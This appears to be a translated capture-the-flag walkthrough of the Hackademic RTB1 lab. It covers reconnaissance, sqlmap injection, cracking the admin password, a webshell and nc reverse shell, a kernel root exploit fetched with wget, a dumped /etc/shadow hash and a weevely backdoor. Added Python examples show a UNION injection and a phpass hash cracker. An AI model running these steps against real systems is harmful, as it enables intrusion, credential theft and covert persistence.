Other sites on the same IP (reverse IP lookup via sameip.org):

Same IP: 26 sites hosted on IP address 173.236.138.113

ID  Domain
1   hijackthisforum.com
2   sportforum.net
3   freeonlinesudoku.net
4   cosplayhell.com
5   videogamenews.org
6   gametour.com
7   qualitypetsitting.net
8   brendanichols.com
9   8ez.com
10  hack-test.com
11  kisax.com
12  paisans.com
13  mghz.com
14  debateful.com
15  jazzygoodtimes.com
16  fruny.com
17  vbum.com
18  wuckie.com
19  force5inc.com
20  virushero.com
21  twincitiesbusinesspeernetwork.com
22  jennieko.com
23  davereedy.com
24  joygarrido.com
25  prismapp.com
26  utiligolf.com
A total of 26 sites are hosted on the server at [173.236.138.113]. To get at a target, many attackers also bring its neighbours on the same host into scope, but for learning purposes we set the other sites aside today.

We need more information about the target (in my view this stage of a penetration test matters far more than the actual testing), including:

1. DNS records (A, NS, TXT, MX)
2. Web server type (IIS, Apache, Tomcat)
3. Domain registrant details (the company holding the domain, and so on)
4. Names, phone numbers, e-mail addresses and postal addresses of the site's administrators and related staff
5. Server-side scripting languages the site supports (PHP, ASP, JSP, ASP.NET, CFM)
6. The target's operating system (UNIX, Linux, Windows, Solaris)
7. Open ports on the target

Let's look up the DNS records first, here with who.is. The target's DNS records:

Record             Type  TTL      Priority  Content
hack-test.com      A     4 hours            173.236.138.113
hack-test.com      SOA   4 hours            ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
hack-test.com      NS    4 hours            ns1.dreamhost.com
hack-test.com      NS    4 hours            ns3.dreamhost.com
hack-test.com      NS    4 hours            ns2.dreamhost.com
www.hack-test.com  A     4 hours            173.236.138.113

Next, confirm the web server type. It is plainly Apache; we will pin down the version in a moment:

HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968  3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0  3 Month: 3.7

Now it is time to look up the domain holder, who may well be the administrator. With some details about the administrator in hand, bring out WhatWeb from BackTrack 5 to identify the operating system and web server version.

WhatWeb shows that the site runs WordPress, the well-known open-source PHP blogging platform, that the server is a Fedora Linux distribution, and that the web server is Apache 2.2.15. Next, let's see which ports the target server has open, using Nmap.

1 – Enumerate the services the target server exposes

root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed.
Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

2 – Identify the target server's operating system

root@bt:/# nmap -O hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

Uh-oh: only port 80 is open, and the host is fingerprinted as Fedora Core 6 with a 2.6.22 kernel. Two things are worth noting here. First, hack-test.com resolves to 192.168.1.2 with a VMware MAC address, so the scan is running against a local lab VM (Hackademic RTB1) rather than the public host. Second, the OS fingerprint is only Nmap's best guess from TCP/IP behaviour; the uname -a output later in the walkthrough shows the real kernel is 2.6.31.5 on Fedora 12, so treat -O results as a hint to be confirmed, not a fact.

We have now gathered a good deal of important information about the target. Time to scan it for vulnerabilities (SQL injection, blind SQL injection, LFI, RFI, XSS, CSRF, and so on). Let's start with Nikto and see whether it turns anything up:

root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.1.2
+ Target Hostname:    hack-test.com
+ Target Port:        80
+ Start Time:         2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)
---------------------------------------------------------------------------

Nikto's findings are modest but real: the TRACE method is enabled (cross-site tracing), /icons/ allows directory listing and still carries the default README, the ETag header leaks the file's inode number, and the Apache build is out of date. None of them is a way in by itself, but each is a server-side misconfiguration (TraceEnable, Options -Indexes, FileETag) that a hardening pass would remove.

Let's also try w3af (an OWASP open-source project, and a good one):

root@bt:/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
Python version: 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) [GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0
w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.

In the GUI, scanning is as simple as entering the URL. Time for a cup of tea (as I used to write when submitting to magazines); wait for the scan to finish and review the results.

You can see quite a few vulnerabilities; let's try the SQL injection first.

url – http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

Then exploit it! Tests for the other vulnerabilities failed, so let's use sqlmap to dump the database (enumerate the database and save the target's data locally).

Dump it! sqlmap -u url

After a moment you see sqlmap's confirmation; press n and Enter and you get an error-based injection point, with the MySQL version disclosed in the error message.

Use sqlmap to list all databases with --dbs: three databases are found.

List all tables in the WordPress database with -D wordpress --tables.

Then the columns (you need to know yourself which table holds the sensitive data) with -T wp_users --columns: 22 columns.

Then dump the data with -C user_login,user_pass --dump.

Then crack the administrator's hash, here with http://www.onlinehashcrack.com/free-hash-reverse.php

The plaintext password is q1w2e3 (it would hold its own on the leaked CSDN password top list, ha). Now log into the backend and get a webshell.

Get in!

Let's upload a PHP webshell. Here I use the plugin-editor method (see my earlier tips; there are plenty of other ways). Just save it, then browse to the file and there is our webshell.

As every hacker knows, the next step is privilege escalation. Use a reverse connection to get an interactive shell: listen locally with nc (a classic is a classic). Once connected, try a few Linux commands to get a feel for it:

id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

I won't translate what each command does. With the kernel version in hand we can search exploit-db.com for a matching exploit to escalate privileges. The original author fetched it with wget (domestic readers, work out your own download route):

wget http://www.exploit-db.com/download/15285 -O roro.c
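Before moving on to the kernel exploit, it is worth seeing exactly what the injection step above relied on. Two things happened: the probe d'z"0 (the decoded ?cat=d%27z%220) broke the query and the application echoed a database error, which is the error-based signal w3af and sqlmap key on; and once confirmed, the same parameter could be used to pull user_login and user_pass out of wp_users, which is what sqlmap's --dump automates. The following is an added example, not code from the original article or from WordPress: it reproduces both behaviours against an in-memory SQLite database with constructed rows (the table names mirror WordPress, the hash value is a placeholder) and puts the string-concatenated query beside its parameterised fix. SQLite's error text differs from MySQL's, but the detection logic is identical.

```python
import sqlite3
from typing import Callable, List, Optional

# Constructed sample data: WordPress-like table names, placeholder hash (not a real one).
FAKE_HASH = "$P$Bplaceholder.not.a.real.hash.00"
PROBE = "d'z\"0"  # the decoded ?cat=d%27z%220 from the w3af finding
UNION_PAYLOAD = "x' UNION SELECT user_login || ':' || user_pass FROM wp_users -- "


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the WordPress MySQL database."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, cat TEXT, post_title TEXT);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_posts VALUES (1, 'news', 'Hello world!');
        INSERT INTO wp_posts VALUES (2, 'misc', 'Second post');
        """
    )
    con.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (FAKE_HASH,))
    con.commit()
    return con


def vulnerable_lookup(con: sqlite3.Connection, cat: str) -> List[str]:
    """Builds the query by string concatenation: the ?cat= bug on the page, in miniature."""
    sql = "SELECT post_title FROM wp_posts WHERE cat = '" + cat + "'"
    return [row[0] for row in con.execute(sql)]


def safe_lookup(con: sqlite3.Connection, cat: str) -> List[str]:
    """Same query with a bound parameter; user input never reaches the SQL parser."""
    sql = "SELECT post_title FROM wp_posts WHERE cat = ?"
    return [row[0] for row in con.execute(sql, (cat,))]


Lookup = Callable[[sqlite3.Connection, str], List[str]]


def error_probe(con: sqlite3.Connection, lookup: Lookup) -> Optional[str]:
    """Error-based detection: send the mismatched-quote probe and watch for a DB error.
    Returns the error text if the query broke (injectable), None if it did not."""
    try:
        lookup(con, PROBE)
    except sqlite3.Error as exc:
        return str(exc)
    return None


def dump_users(con: sqlite3.Connection, lookup: Lookup) -> List[str]:
    """Exploitation: ride the same parameter with a UNION to read wp_users,
    the manual form of `sqlmap -T wp_users -C user_login,user_pass --dump`."""
    return lookup(con, UNION_PAYLOAD)


if __name__ == "__main__":
    db = build_db()
    for name, fn in (("concatenated", vulnerable_lookup), ("parameterised", safe_lookup)):
        print(f"{name:13s} probe error : {error_probe(db, fn)!r}")
        print(f"{name:13s} union result: {dump_users(db, fn)!r}")
```

Run stand-alone, the concatenated version reports a syntax error for the probe and hands back admin:<hash> for the UNION payload; the parameterised version returns no error and an empty result for both, because the payload is compared as a literal category name rather than parsed as SQL. The trailing "-- " in the payload comments out the closing quote the application appends, which is why the injected query still parses.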
wget follows a 301 redirect to http://www.exploit-db.com/download/15285/ and saves the 7,154-byte file as roro.c. Exploit-db entry 15285 is Dan Rosenberg's RDS socket privilege escalation (CVE-2010-3904), which targets kernels from 2.6.30 up to 2.6.36-rc8 and needs the rds module to be present or auto-loadable; the running 2.6.31.5 kernel is in range. I won't paste the code. Compile the exploit with gcc and run it:

gcc roro.c -o roro
./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...

Stay calm, type id, and you will find: root it!
Now we can read /etc/shadow and /etc/passwd (only part of the output is shown here):

cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::

We could crack that hash (the $6$ prefix marks SHA-512 crypt) with John the Ripper, but we won't. What one normally does instead is leave a backdoor to maintain access, so the front page can be defaced at any time (just a joke).

We'll use weevely from BackTrack 5 to upload a password-protected PHP webshell.

1 – weevely's options

root@bt:/pentest/backdoors/web/weevely# ./main.py
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

Usage: main.py [options]

Options:
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p .
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor .
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p.
  -t, --terminal        Start a terminal-like session, requires -u and -p .
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the given file,
                        in the form 'label,url,password' where label is optional.
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor .
  -u URL, --url=URL     Remote backdoor URL .

2 – Generate a PHP webshell with it

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file 'hax.php' created with password 'koko'.

3 – Upload it

We can now connect with weevely and control the host. Test it (in practice it is much like a one-line PHP shell with a password in front of it).

Summary: the original author's writing is clear, the penetration-testing workflow is sound, and it is a very standard introductory article.
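Two password hashes appear in this walkthrough: the WordPress administrator's hash dumped from wp_users.user_pass (cracked above via an online service, plaintext q1w2e3) and root's $6$ SHA-512 crypt entry from /etc/shadow, which the author leaves for John the Ripper. WordPress stores its passwords as phpass "portable" hashes ($P$ followed by a cost character and an 8-character salt), a salted, iterated MD5 scheme that is cheap enough to attack offline without handing the hash to a third party. The following is an added example, mine rather than code from the original article or from WordPress: it implements the phpass algorithm, verifies a candidate against a stored hash, and runs a small dictionary attack. The hash it attacks is constructed here from the page's recovered password with a made-up salt (the article never shows the real hash), and the word list is likewise constructed.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# phpass alphabet (not the standard base64 ordering)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant: 3 bytes -> 4 chars, low bits first."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_hash(password: str, setting: str) -> Optional[str]:
    """Recompute a phpass portable hash ($P$ or $H$) from a password and the 12-char
    setting (3-char prefix, cost character, 8-char salt). Returns None on a bad setting."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        return None
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return None
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):  # 'B' -> 2**13 = 8192 rounds, the WordPress default
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_check(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    computed = phpass_hash(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: the salt is inside the hash, so each guess costs 8193 MD5s."""
    for candidate in wordlist:
        if phpass_check(candidate, stored):
            return candidate
    return None


# Constructed demo: the page's recovered password hashed with a made-up salt.
DEMO_SETTING = "$P$B" + "aBcDeFgH"  # 'B' = count_log2 13, as WordPress uses
DEMO_HASH = phpass_hash("q1w2e3", DEMO_SETTING)
DEMO_WORDLIST = ["123456", "password", "admin123", "q1w2e3", "letmein"]

if __name__ == "__main__":
    print("hash   :", DEMO_HASH)
    print("cracked:", crack(DEMO_HASH, DEMO_WORDLIST))
```

The resulting hash is 34 characters: the 12-character setting followed by 22 characters encoding the 16-byte digest. Because the salt is embedded in the stored value, nothing beyond the hash itself is needed to attack it offline, and 8,192 MD5 rounds per guess is slow for a login form but trivial against a password like q1w2e3. The $6$ entry from /etc/shadow is a different algorithm (SHA-512 crypt with its own salt and rounds) and is not handled by this code; John the Ripper supports it directly.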